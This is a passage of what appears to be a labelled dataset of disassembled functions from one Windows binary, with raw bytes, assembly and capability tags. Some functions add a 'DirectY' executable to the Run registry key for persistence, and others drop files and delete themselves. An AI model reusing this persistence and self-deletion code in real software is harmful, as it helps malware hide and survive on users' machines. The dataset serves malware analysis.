"mov eax, dword [0x5d4ec4]",
"mov dword [edi + 0xc], eax",
"cmp dword [0x5d4ec4], 0",
"je 0x410a80",
"mov eax, dword [0x5d4ec4]",
"mov dword [eax + 8], edi",
"mov eax, dword [ebx + 0x94]",
"mov dword [0x5d4ec4], eax",
"nop",
"sub word [0x5d4f10], 1",
"cmp word [0x5d4f10], 0",
"sete bl",
"mov eax, 0x5d4ef0",
"call fcn.00410c40",
"test bl, bl",
"je 0x410abc",
"mov eax, 0x5d4ef0",
"call fcn.00410c10",
"lea esi, [esi]",
"pop edi",
"pop esi",
"pop ebx",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x412c60
|
[
"Set environment variable"
] |
5589e58d6424f053565789c6c745f40000000031c068502c41005568a042410064ff306489208d45f0506a006a0089f085f67505b8f0425d0050e861e5feff89c38d53ff8d45f4e80489ffff8d45f0508b45f485c07505b8f0425d00505389f085f67505b8f0425d0050e831e5feff89c285d20f84b5000000eb0883ea0183fa03760c8b45f466817c50fe5c0074ec89d8bf0000000083e80183df0089d131db39df750439c8740b8d45f4e89b88ffff8d7600b8e01140008b55f4e8abfeffff8b1570505d0085d27409a160415d00ffd2eb05b864415d006681380000755689f085f674038b40fc83f8027e4866817e023a00754066c745f83d00668b06668945fa66c745fc3a0066c745fe00008b45f485c07505b8f0425d00508d45f850e887e4feff8d7600eb0cb8e011400089f2e836feffff8b1570505d0085d27409a160415d00ffd2eb05b864415d006681380200751f8b1570505d0085d27409a160415d00ffd2eb05b864415d0066c700030089f631c05a83c40c64891089e8e868feffff5f5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x10]",
"push ebx",
"push esi",
"push edi",
"mov esi, eax",
"mov dword [ebp - 0xc], 0",
"xor eax, eax",
"push fcn.00412c50",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"lea eax, [ebp - 0x10]",
"push eax",
"push 0",
"push 0",
"mov eax, esi",
"test esi, esi",
"jne 0x412c99",
"mov eax, 0x5d42f0",
"push eax",
"call sub.kernel32.dll_GetFullPathNameW",
"mov ebx, eax",
"lea edx, [ebx - 1]",
"lea eax, [ebp - 0xc]",
"call fcn.0040b5b0",
"lea eax, [ebp - 0x10]",
"push eax",
"mov eax, dword [ebp - 0xc]",
"test eax, eax",
"jne 0x412cbc",
"mov eax, 0x5d42f0",
"push eax",
"push ebx",
"mov eax, esi",
"test esi, esi",
"jne 0x412cc9",
"mov eax, 0x5d42f0",
"push eax",
"call sub.kernel32.dll_GetFullPathNameW",
"mov edx, eax",
"test edx, edx",
"je 0x412d8e",
"jmp 0x412ce3",
"sub edx, 1",
"cmp edx, 3",
"jbe 0x412cf4",
"mov eax, dword [ebp - 0xc]",
"cmp word [eax + edx*2 - 2], 0x5c",
"je 0x412ce0",
"mov eax, ebx",
"mov edi, 0",
"sub eax, 1",
"sbb edi, 0",
"mov ecx, edx",
"xor ebx, ebx",
"cmp edi, ebx",
"jne 0x412d0d",
"cmp eax, ecx",
"je 0x412d18",
"lea eax, [ebp - 0xc]",
"call fcn.0040b5b0",
"lea esi, [esi]",
"mov eax, 0x4011e0",
"mov edx, dword [ebp - 0xc]",
"call fcn.00412bd0",
"mov edx, dword [0x5d5070]",
"test edx, edx",
"je 0x412d38",
"mov eax, dword [0x5d4160]",
"call edx",
"jmp 0x412d3d",
"mov eax, 0x5d4164",
"cmp word [eax], 0",
"jne 0x412d9a",
"mov eax, esi",
"test esi, esi",
"je 0x412d4d",
"mov eax, dword [eax - 4]",
"cmp eax, 2",
"jle 0x412d9a",
"cmp word [esi + 2], 0x3a",
"jne 0x412d9a",
"mov word [ebp - 8], 0x3d",
"mov ax, word [esi]",
"mov word [ebp - 6], ax",
"mov word [ebp - 4], 0x3a",
"mov word [ebp - 2], 0",
"mov eax, dword [ebp - 0xc]",
"test eax, eax",
"jne 0x412d7f",
"mov eax, 0x5d42f0",
"push eax",
"lea eax, [ebp - 8]",
"push eax",
"call sub.kernel32.dll_SetEnvironmentVariableW",
"lea esi, [esi]",
"jmp 0x412d9a",
"mov eax, 0x4011e0",
"mov edx, esi",
"call fcn.00412bd0",
"mov edx, dword [0x5d5070]",
"test edx, edx",
"je 0x412dad",
"mov eax, dword [0x5d4160]",
"call edx",
"jmp 0x412db2",
"mov eax, 0x5d4164",
"cmp word [eax], 2",
"jne 0x412dd8",
"mov edx, dword [0x5d5070]",
"test edx, edx",
"je 0x412dcc",
"mov eax, dword [0x5d4160]",
"call edx",
"jmp 0x412dd1",
"mov eax, 0x5d4164",
"mov word [eax], 3",
"mov esi, esi",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00412c50",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x412e10
|
[
"Get common file path"
] |
5589e58d6424e05356578845e08955e4c745e800000000c745ec00000000c745f00000000031c068f02d41005568a042410064ff30648920f645e0ff0f84e80000000fb645e083e8c0668945f866c745fa3a0066c745fc000066c745fe00008d45f4506a006a008d45f850e880e3feff89c68d56ff8b45e4e82387ffff8d45f4508b45e48b1085d27505baf0425d0052568d45f850e856e3feff89c385db7541e87be1feffe8f611ffff8d45f0e8ce72ffff0fb645e083e8c08d55ece85f77ffff8b55ecb9242358008d45f0e8df75ffff8b45f08b55e4e8947fffffe99700000089f0ba0000000083e80183da0089d931ff39fa750439c8740a8b45e489dae89c86ffff803dc066560000756b8b55e48b028d55e8e8268cffff8b55e88b45e4e8db7fffff8d7600eb4e6a006a00e8ade2feff89c68d56ff8b45e4e86086ffff8b55e48b0285c07505b8f0425d005056e88be2feff803dc066560000751a8b55e48b028d55e8e8d58bffff8b55e88b45e4e88a7fffff89f631d25883c40c64890289e8e858feffff5f5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x20]",
"push ebx",
"push esi",
"push edi",
"mov byte [ebp - 0x20], al",
"mov dword [ebp - 0x1c], edx",
"mov dword [ebp - 0x18], 0",
"mov dword [ebp - 0x14], 0",
"mov dword [ebp - 0x10], 0",
"xor eax, eax",
"push fcn.00412df0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"test byte [ebp - 0x20], 0xff",
"je 0x412f3a",
"movzx eax, byte [ebp - 0x20]",
"sub eax, 0xffffffc0",
"mov word [ebp - 8], ax",
"mov word [ebp - 6], 0x3a",
"mov word [ebp - 4], 0",
"mov word [ebp - 2], 0",
"lea eax, [ebp - 0xc]",
"push eax",
"push 0",
"push 0",
"lea eax, [ebp - 8]",
"push eax",
"call sub.kernel32.dll_GetFullPathNameW",
"mov esi, eax",
"lea edx, [esi - 1]",
"mov eax, dword [ebp - 0x1c]",
"call fcn.0040b5b0",
"lea eax, [ebp - 0xc]",
"push eax",
"mov eax, dword [ebp - 0x1c]",
"mov edx, dword [eax]",
"test edx, edx",
"jne 0x412e9f",
"mov edx, 0x5d42f0",
"push edx",
"push esi",
"lea eax, [ebp - 8]",
"push eax",
"call sub.kernel32.dll_GetFullPathNameW",
"mov ebx, eax",
"test ebx, ebx",
"jne 0x412ef1",
"call sub.kernel32.dll_GetLastError",
"call fcn.004040b0",
"lea eax, [ebp - 0x10]",
"call fcn.0040a190",
"movzx eax, byte [ebp - 0x20]",
"sub eax, 0xffffffc0",
"lea edx, [ebp - 0x14]",
"call fcn.0040a630",
"mov edx, dword [ebp - 0x14]",
"mov ecx, 0x582324",
"lea eax, [ebp - 0x10]",
"call fcn.0040a4c0",
"mov eax, dword [ebp - 0x10]",
"mov edx, dword [ebp - 0x1c]",
"call fcn.0040ae80",
"jmp 0x412f88",
"mov eax, esi",
"mov edx, 0",
"sub eax, 1",
"sbb edx, 0",
"mov ecx, ebx",
"xor edi, edi",
"cmp edx, edi",
"jne 0x412f0a",
"cmp eax, ecx",
"je 0x412f14",
"mov eax, dword [ebp - 0x1c]",
"mov edx, ebx",
"call fcn.0040b5b0",
"cmp byte [0x5666c0], 0",
"jne 0x412f88",
"mov edx, dword [ebp - 0x1c]",
"mov eax, dword [edx]",
"lea edx, [ebp - 0x18]",
"call fcn.0040bb50",
"mov edx, dword [ebp - 0x18]",
"mov eax, dword [ebp - 0x1c]",
"call fcn.0040af10",
"lea esi, [esi]",
"jmp 0x412f88",
"push 0",
"push 0",
"call sub.kernel32.dll_GetCurrentDirectoryW",
"mov esi, eax",
"lea edx, [esi - 1]",
"mov eax, dword [ebp - 0x1c]",
"call fcn.0040b5b0",
"mov edx, dword [ebp - 0x1c]",
"mov eax, dword [edx]",
"test eax, eax",
"jne 0x412f5e",
"mov eax, 0x5d42f0",
"push eax",
"push esi",
"call sub.kernel32.dll_GetCurrentDirectoryW",
"cmp byte [0x5666c0], 0",
"jne 0x412f88",
"mov edx, dword [ebp - 0x1c]",
"mov eax, dword [edx]",
"lea edx, [ebp - 0x18]",
"call fcn.0040bb50",
"mov edx, dword [ebp - 0x18]",
"mov eax, dword [ebp - 0x1c]",
"call fcn.0040af10",
"mov esi, esi",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"mov eax, ebp",
"call fcn.00412df0",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x413420
|
[
"Accept command line arguments"
] |
5589e58da424ecfeffff535657c785f4feffff00000000c70560425d0000000000c745fc0000000068040100008d85f8feffff506a00e885dcfeffc68405f8feffff008985f0feffff89c131d289e8e88c0100008b85f0feffff8d4801a160425d008b108d85f8feffffe89101ffffe8fcdbfeffa3c064560089c3e92301000083c3010fb60383e80183f82072f2803b000f840d01000090c685ecfeffff0089dfc785f0feffff00000000e94b0000008a033c01723a2c2076062c027416eb308a85ecfeffff84c074368385f0feffff01eb25807b012274118a85ecfeffff84c00f9485ecfeffffeb0d83c301eb088385f0feffff019083c301803b0075b0f785f4feffffffffffff0f84840000008b8df0feffff8b95f4feffff89e8e8b5000000c685ecfeffff0089fba160425d008b95f4feffff8b3490e94c0000008a033c01723a2c2076062c027416eb308a85ecfeffff84c074368a03880683c601eb25807b012274118a85ecfeffff84c00f9485ecfeffffeb0d83c301eb088a03880683c6019083c301803b0075b0c60600908385f4feffff01803b000f85dffeffff8b9df4feffff891d50425d008d5301c1e202b860425d00e808d2ffffa160425d00c70498000000005f5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x114]",
"push ebx",
"push esi",
"push edi",
"mov dword [ebp - 0x10c], 0",
"mov dword [0x5d4260], 0",
"mov dword [ebp - 4], 0",
"push 0x104",
"lea eax, [ebp - 0x108]",
"push eax",
"push 0",
"call sub.kernel32.dll_GetModuleFileNameA",
"mov byte [ebp + eax - 0x108], 0",
"mov dword [ebp - 0x110], eax",
"mov ecx, eax",
"xor edx, edx",
"mov eax, ebp",
"call fcn.00413600",
"mov eax, dword [ebp - 0x110]",
"lea ecx, [eax + 1]",
"mov eax, dword [0x5d4260]",
"mov edx, dword [eax]",
"lea eax, [ebp - 0x108]",
"call fcn.00403620",
"call sub.kernel32.dll_GetCommandLineA",
"mov dword [0x5664c0], eax",
"mov ebx, eax",
"jmp 0x4135c3",
"add ebx, 1",
"movzx eax, byte [ebx]",
"sub eax, 1",
"cmp eax, 0x20",
"jb 0x4134a8",
"cmp byte [ebx], 0",
"je 0x4135cc",
"nop",
"mov byte [ebp - 0x114], 0",
"mov edi, ebx",
"mov dword [ebp - 0x110], 0",
"jmp 0x413523",
"mov al, byte [ebx]",
"cmp al, 1",
"jb 0x413518",
"sub al, 0x20",
"jbe 0x4134e8",
"sub al, 2",
"je 0x4134fc",
"jmp 0x413518",
"mov al, byte [ebp - 0x114]",
"test al, al",
"je 0x413528",
"add dword [ebp - 0x110], 1",
"jmp 0x413520",
"cmp byte [ebx + 1], 0x22",
"je 0x413513",
"mov al, byte [ebp - 0x114]",
"test al, al",
"sete byte [ebp - 0x114]",
"jmp 0x413520",
"add ebx, 1",
"jmp 0x413520",
"add dword [ebp - 0x110], 1",
"nop",
"add ebx, 1",
"cmp byte [ebx], 0",
"jne 0x4134d8",
"test dword [ebp - 0x10c], 0xffffffff",
"je 0x4135bc",
"mov ecx, dword [ebp - 0x110]",
"mov edx, dword [ebp - 0x10c]",
"mov eax, ebp",
"call fcn.00413600",
"mov byte [ebp - 0x114], 0",
"mov ebx, edi",
"mov eax, dword [0x5d4260]",
"mov edx, dword [ebp - 0x10c]",
"mov esi, dword [eax + edx*4]",
"jmp 0x4135b3",
"mov al, byte [ebx]",
"cmp al, 1",
"jb 0x4135a8",
"sub al, 0x20",
"jbe 0x413578",
"sub al, 2",
"je 0x41358c",
"jmp 0x4135a8",
"mov al, byte [ebp - 0x114]",
"test al, al",
"je 0x4135b8",
"mov al, byte [ebx]",
"mov byte [esi], al",
"add esi, 1",
"jmp 0x4135b0",
"cmp byte [ebx + 1], 0x22",
"je 0x4135a3",
"mov al, byte [ebp - 0x114]",
"test al, al",
"sete byte [ebp - 0x114]",
"jmp 0x4135b0",
"add ebx, 1",
"jmp 0x4135b0",
"mov al, byte [ebx]",
"mov byte [esi], al",
"add esi, 1",
"nop",
"add ebx, 1",
"cmp byte [ebx], 0",
"jne 0x413568",
"mov byte [esi], 0",
"nop",
"add dword [ebp - 0x10c], 1",
"cmp byte [ebx], 0",
"jne 0x4134ab",
"mov ebx, dword [ebp - 0x10c]",
"mov dword [0x5d4250], ebx",
"lea edx, [ebx + 1]",
"shl edx, 2",
"mov eax, 0x5d4260",
"call fcn.004107f0",
"mov eax, dword [0x5d4260]",
"mov dword [eax + ebx*4], 0",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x426e50
|
[
"Get common file path"
] |
5589e58da424f8feffff8945fcc785f8feffff0000000031c068406e42005568a042410064ff3064892068ff0000008d85fcfeffff50e885a6fdff6a018d85f8feffff508d85fcfeffff6631c9baff000000e80925feff8b85f8feffff8b55fce89bed010031c05a83c40c64891089e8e87bffffff89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x108]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 0x108], 0",
"xor eax, eax",
"push fcn.00426e40",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"push 0xff",
"lea eax, [ebp - 0x104]",
"push eax",
"call sub.kernel32.dll_GetSystemDirectoryA",
"push 1",
"lea eax, [ebp - 0x108]",
"push eax",
"lea eax, [ebp - 0x104]",
"xor cx, cx",
"mov edx, 0xff",
"call fcn.004093b0",
"mov eax, dword [ebp - 0x108]",
"mov edx, dword [ebp - 4]",
"call fcn.00445c50",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00426e40",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x426f00
|
[
"Persist via run registry key"
] |
5589e58d6424f0ba207258008d45f4e8bc76feffc745f00000000031c068e06e42005568a042410064ff306489208d45f4ba386d5800e8851afeff6a008d45f0e80bffffff8b55f08d45f8b9506d5800e86b1bfeffba01000000b8c41c5d00e83cb713008945fc31c068d06e42005568a042410064ff306489208b45fcba01000080e8d9b613008b45fcb101ba746d5800e83ab913008b55f48b45fc8d4df0e80cbb13008b45f08b55f8e8d125feff85c074118b4df88b55f48b45fce8afbc13008d760031c05a83c40c64891089e8e8fcfeffff31c05a83c40c64891089e8e8fcfeffff89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x10]",
"mov edx, 0x587220",
"lea eax, [ebp - 0xc]",
"call fcn.0040e5d0",
"mov dword [ebp - 0x10], 0",
"xor eax, eax",
"push fcn.00426ee0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"lea eax, [ebp - 0xc]",
"mov edx, str.Parametr",
"call fcn.004089c0",
"push 0",
"lea eax, [ebp - 0x10]",
"call fcn.00426e50",
"mov edx, dword [ebp - 0x10]",
"lea eax, [ebp - 8]",
"mov ecx, str.DirectYdirecty.exe",
"call fcn.00408ac0",
"mov edx, 1",
"mov eax, 0x5d1cc4",
"call fcn.005626a0",
"mov dword [ebp - 4], eax",
"xor eax, eax",
"push fcn.00426ed0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 4]",
"mov edx, 0x80000001",
"call fcn.00562660",
"mov eax, dword [ebp - 4]",
"mov cl, 1",
"mov edx, str.SoftwareMicrosoftWindowsCurrentVersionRun",
"call fcn.005628d0",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 4]",
"lea ecx, [ebp - 0x10]",
"call fcn.00562ab0",
"mov eax, dword [ebp - 0x10]",
"mov edx, dword [ebp - 8]",
"call fcn.00409580",
"test eax, eax",
"je 0x426fc4",
"mov ecx, dword [ebp - 8]",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 4]",
"call fcn.00562c70",
"lea esi, [esi]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00426ed0",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00426ee0",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4271d0
|
[
"Create process on windows",
"Self delete"
] |
5589e58da424c0feffff53c745f800000000c745f400000000c745f000000000c745c000000000c745c400000000c745c800000000c745cc00000000c745d000000000c745e000000000c745e40000000031c068707142005568a042410064ff30648920c70570565d0000e41e006a008d45e4e808fcffff8b55e48d45f8b9106f5800e86818feff8d55e431c0e84ed7feff8b45e48d55f4e843f7ffff8b45f485c074038b40fca304565d008b45f8e82cbdfeff8b45f8ba06000000e81ff001008d45e0e867c8fdff68ffff00008b55f8b9286f58008d45e0e81218feff8b45e0e8fabcfeff8d45e0e842c8fdff68ffff00008b55f8b93c6f58008d45e0e8ed17feff8b45e0e8d5bcfeffe8907cfeff6685c074076a01e8e49ffdffb8ff000000e8aa7bfeff83c0018845e86a008d45e0508b0d70565d008b45f4ba01000000e8cb24feff8b45e08945d48d45cc508b0d04565d00a170565d0029c183e901a170565d008d50018b45f4e8a124feff8b45cc8b4df48b1504565d008a5411ff8d4de4e839faffff8b45e48a55e88d4dd0e85bf9ffff8b45d08945d88a45e88d4dc86631d2e8371ffeff8b45c88945dc8d55d48d45f0b902000000e8c119feff8d45cce869c7fdff6a008b0d00565d008b55f88d45cce81617feff8b45cc8b55f0e8abf6ffffc745fc000000008d7426008345fc018d45cce834c7fdff6a008b45fc8b0cc500565d008b55f88d45cce8dd16feff8d5dcc8b03e8f39804008b4dfc8b1ccd04565d0089d9c1f91f39ca750439d874188b45fc8b04c500565d00ba546f5800e86821feff85c075308d45c8e8dcc6fdff68ffff00008b45fc8b0cc500565d008b55f88d45c8e88216feff8b45c8b201e848ed010084c075648d45c4508b45fc8b0cc504565d00a170565d008d50018b45f4e87623feff8b45c48b55f48b0d04565d008a540aff8d4de4e80ef9ffff8b5de48d45c4e873c6fdff6a008b45fc8b0cc500565d008b55f88d45c4e81c16feff8b45c489dae8b2f5ffff89f68b45fc8b14c504565d00011570565d00837dfc0d0f8cf6feffffe831faffff8d55c431c0e8d7d4feff8b45c48d55c8e82c2afeff8b55c8b901000000b8686f5800e89a23feff85c075128d45c4e80efbffff8b45c4e896680e0089f68b45f8e81cbbfeffe8077afeff6a00b97c6f5800ba01000000b834225d00bb34225d00ff53688945ecc745fc000000008d7426008345fc016a008d45c4508d45e4e8aec5fdff6a0068ff0000008b45fc8d8dc0feffffbaffffffffe864d8fdff8d4dc06631d28d85c0feffffe8c31cfeff30c96631d28d45c0e8862afeff8b4dc0ba8c6f58008d45e4e82615feff8b55e48b45ecb99c6f58008b5dec8b1bff53748b55c48b45fc8d04c578565d00e80114feff6a006a008d45c0e835c5fdff6a0068ff0000008b45fc8d8dc0feffffbaffffffffe8ebd7fdff8d4dc46631d28d85c0feffffe84a1cfeff30c96631d28d45c4e80d2afeff8b4dc4ba8c6f58008d45c0e8ad14feff8b55c08b45ecb9b06f58008b5dec8b1bff93840000008b55fc8904d57c565d008b45fcff34c57c565d00e88e9cfdff6a006a008d45c0e8b2c4fdff6a008b45fc8b0cc578565d00bac46f58008d45c0e85914feff8b45c085c07505b8f0425d0050b8c86f580050b8d06f580050b830750000e81678feff05e803000050e85bb4fdff837dfc050f8ca1feffff8b45ece8e958feffa1c07056008b15c07056008b12ff92fc00000031c05a83c40c64891089e8e8a6faffff5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x140]",
"push ebx",
"mov dword [ebp - 8], 0",
"mov dword [ebp - 0xc], 0",
"mov dword [ebp - 0x10], 0",
"mov dword [ebp - 0x40], 0",
"mov dword [ebp - 0x3c], 0",
"mov dword [ebp - 0x38], 0",
"mov dword [ebp - 0x34], 0",
"mov dword [ebp - 0x30], 0",
"mov dword [ebp - 0x20], 0",
"mov dword [ebp - 0x1c], 0",
"xor eax, eax",
"push fcn.00427170",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [0x5d5670], 0x1ee400",
"push 0",
"lea eax, [ebp - 0x1c]",
"call fcn.00426e50",
"mov edx, dword [ebp - 0x1c]",
"lea eax, [ebp - 8]",
"mov ecx, str.DirectY",
"call fcn.00408ac0",
"lea edx, [ebp - 0x1c]",
"xor eax, eax",
"call fcn.004149b0",
"mov eax, dword [ebp - 0x1c]",
"lea edx, [ebp - 0xc]",
"call fcn.004269b0",
"mov eax, dword [ebp - 0xc]",
"test eax, eax",
"je 0x427277",
"mov eax, dword [eax - 4]",
"mov dword [0x5d5604], eax",
"mov eax, dword [ebp - 8]",
"call fcn.00412fb0",
"mov eax, dword [ebp - 8]",
"mov edx, 6",
"call fcn.004462b0",
"lea eax, [ebp - 0x20]",
"call fcn.00403b00",
"push 0xffff",
"mov edx, dword [ebp - 8]",
"mov ecx, str.php",
"lea eax, [ebp - 0x20]",
"call fcn.00408ac0",
"mov eax, dword [ebp - 0x20]",
"call fcn.00412fb0",
"lea eax, [ebp - 0x20]",
"call fcn.00403b00",
"push 0xffff",
"mov edx, dword [ebp - 8]",
"mov ecx, str.phpext",
"lea eax, [ebp - 0x20]",
"call fcn.00408ac0",
"mov eax, dword [ebp - 0x20]",
"call fcn.00412fb0",
"call fcn.0040ef70",
"test ax, ax",
"je 0x4272ec",
"push 1",
"call sub.kernel32.dll_Sleep",
"mov eax, 0xff",
"call fcn.0040eea0",
"add eax, 1",
"mov byte [ebp - 0x18], al",
"push 0",
"lea eax, [ebp - 0x20]",
"push eax",
"mov ecx, dword [0x5d5670]",
"mov eax, dword [ebp - 0xc]",
"mov edx, 1",
"call fcn.004097e0",
"mov eax, dword [ebp - 0x20]",
"mov dword [ebp - 0x2c], eax",
"lea eax, [ebp - 0x34]",
"push eax",
"mov ecx, dword [0x5d5604]",
"mov eax, dword [0x5d5670]",
"sub ecx, eax",
"sub ecx, 1",
"mov eax, dword [0x5d5670]",
"lea edx, [eax + 1]",
"mov eax, dword [ebp - 0xc]",
"call fcn.004097e0",
"mov eax, dword [ebp - 0x34]",
"mov ecx, dword [ebp - 0xc]",
"mov edx, dword [0x5d5604]",
"mov dl, byte [ecx + edx - 1]",
"lea ecx, [ebp - 0x1c]",
"call fcn.00426d90",
"mov eax, dword [ebp - 0x1c]",
"mov dl, byte [ebp - 0x18]",
"lea ecx, [ebp - 0x30]",
"call fcn.00426cc0",
"mov eax, dword [ebp - 0x30]",
"mov dword [ebp - 0x28], eax",
"mov al, byte [ebp - 0x18]",
"lea ecx, [ebp - 0x38]",
"xor dx, dx",
"call fcn.004092b0",
"mov eax, dword [ebp - 0x38]",
"mov dword [ebp - 0x24], eax",
"lea edx, [ebp - 0x2c]",
"lea eax, [ebp - 0x10]",
"mov ecx, 2",
"call fcn.00408d50",
"lea eax, [ebp - 0x34]",
"call fcn.00403b00",
"push 0",
"mov ecx, dword [0x5d5600]",
"mov edx, dword [ebp - 8]",
"lea eax, [ebp - 0x34]",
"call fcn.00408ac0",
"mov eax, dword [ebp - 0x34]",
"mov edx, dword [ebp - 0x10]",
"call fcn.00426a60",
"mov dword [ebp - 4], 0",
"lea esi, [esi]",
"add dword [ebp - 4], 1",
"lea eax, [ebp - 0x34]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 4]",
"mov ecx, dword [eax*8 + 0x5d5600]",
"mov edx, dword [ebp - 8]",
"lea eax, [ebp - 0x34]",
"call fcn.00408ac0",
"lea ebx, [ebp - 0x34]",
"mov eax, dword [ebx]",
"call fcn.00470ce0",
"mov ecx, dword [ebp - 4]",
"mov ebx, dword [ecx*8 + 0x5d5604]",
"mov ecx, ebx",
"sar ecx, 0x1f",
"cmp edx, ecx",
"jne 0x427404",
"cmp eax, ebx",
"je 0x42741c",
"mov eax, dword [ebp - 4]",
"mov eax, dword [eax*8 + 0x5d5600]",
"mov edx, str.ini",
"call fcn.00409580",
"test eax, eax",
"jne 0x42744c",
"lea eax, [ebp - 0x38]",
"call fcn.00403b00",
"push 0xffff",
"mov eax, dword [ebp - 4]",
"mov ecx, dword [eax*8 + 0x5d5600]",
"mov edx, dword [ebp - 8]",
"lea eax, [ebp - 0x38]",
"call fcn.00408ac0",
"mov eax, dword [ebp - 0x38]",
"mov dl, 1",
"call fcn.00446190",
"test al, al",
"jne 0x4274b0",
"lea eax, [ebp - 0x3c]",
"push eax",
"mov eax, dword [ebp - 4]",
"mov ecx, dword [eax*8 + 0x5d5604]",
"mov eax, dword [0x5d5670]",
"lea edx, [eax + 1]",
"mov eax, dword [ebp - 0xc]",
"call fcn.004097e0",
"mov eax, dword [ebp - 0x3c]",
"mov edx, dword [ebp - 0xc]",
"mov ecx, dword [0x5d5604]",
"mov dl, byte [edx + ecx - 1]",
"lea ecx, [ebp - 0x1c]",
"call fcn.00426d90",
"mov ebx, dword [ebp - 0x1c]",
"lea eax, [ebp - 0x3c]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 4]",
"mov ecx, dword [eax*8 + 0x5d5600]",
"mov edx, dword [ebp - 8]",
"lea eax, [ebp - 0x3c]",
"call fcn.00408ac0",
"mov eax, dword [ebp - 0x3c]",
"mov edx, ebx",
"call fcn.00426a60",
"mov esi, esi",
"mov eax, dword [ebp - 4]",
"mov edx, dword [eax*8 + 0x5d5604]",
"add dword [0x5d5670], edx",
"cmp dword [ebp - 4], 0xd",
"jl 0x4273c0",
"call fcn.00426f00",
"lea edx, [ebp - 0x3c]",
"xor eax, eax",
"call fcn.004149b0",
"mov eax, dword [ebp - 0x3c]",
"lea edx, [ebp - 0x38]",
"call fcn.00409f10",
"mov edx, dword [ebp - 0x38]",
"mov ecx, 1",
"mov eax, str.DIRECTY",
"call fcn.00409890",
"test eax, eax",
"jne 0x42750c",
"lea eax, [ebp - 0x3c]",
"call fcn.00427010",
"mov eax, dword [ebp - 0x3c]",
"call fcn.0050dda0",
"mov esi, esi",
"mov eax, dword [ebp - 8]",
"call fcn.00413030",
"call fcn.0040ef20",
"push 0",
"mov ecx, 0x586f7c",
"mov edx, 1",
"mov eax, 0x5d2234",
"mov ebx, 0x5d2234",
"call dword [ebx + 0x68]",
"mov dword [ebp - 0x14], eax",
"mov dword [ebp - 4], 0",
"lea esi, [esi]",
"add dword [ebp - 4], 1",
"push 0",
"lea eax, [ebp - 0x3c]",
"push eax",
"lea eax, [ebp - 0x1c]",
"call fcn.00403b00",
"push 0",
"push 0xff",
"mov eax, dword [ebp - 4]",
"lea ecx, [ebp - 0x140]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x40]",
"xor dx, dx",
"lea eax, [ebp - 0x140]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x40]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x40]",
"mov edx, 0x586f8c",
"lea eax, [ebp - 0x1c]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x1c]",
"mov eax, dword [ebp - 0x14]",
"mov ecx, str.Path",
"mov ebx, dword [ebp - 0x14]",
"mov ebx, dword [ebx]",
"call dword [ebx + 0x74]",
"mov edx, dword [ebp - 0x3c]",
"mov eax, dword [ebp - 4]",
"lea eax, [eax*8 + 0x5d5678]",
"call fcn.004089c0",
"push 0",
"push 0",
"lea eax, [ebp - 0x40]",
"call fcn.00403b00",
"push 0",
"push 0xff",
"mov eax, dword [ebp - 4]",
"lea ecx, [ebp - 0x140]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x3c]",
"xor dx, dx",
"lea eax, [ebp - 0x140]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x3c]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x3c]",
"mov edx, 0x586f8c",
"lea eax, [ebp - 0x40]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x40]",
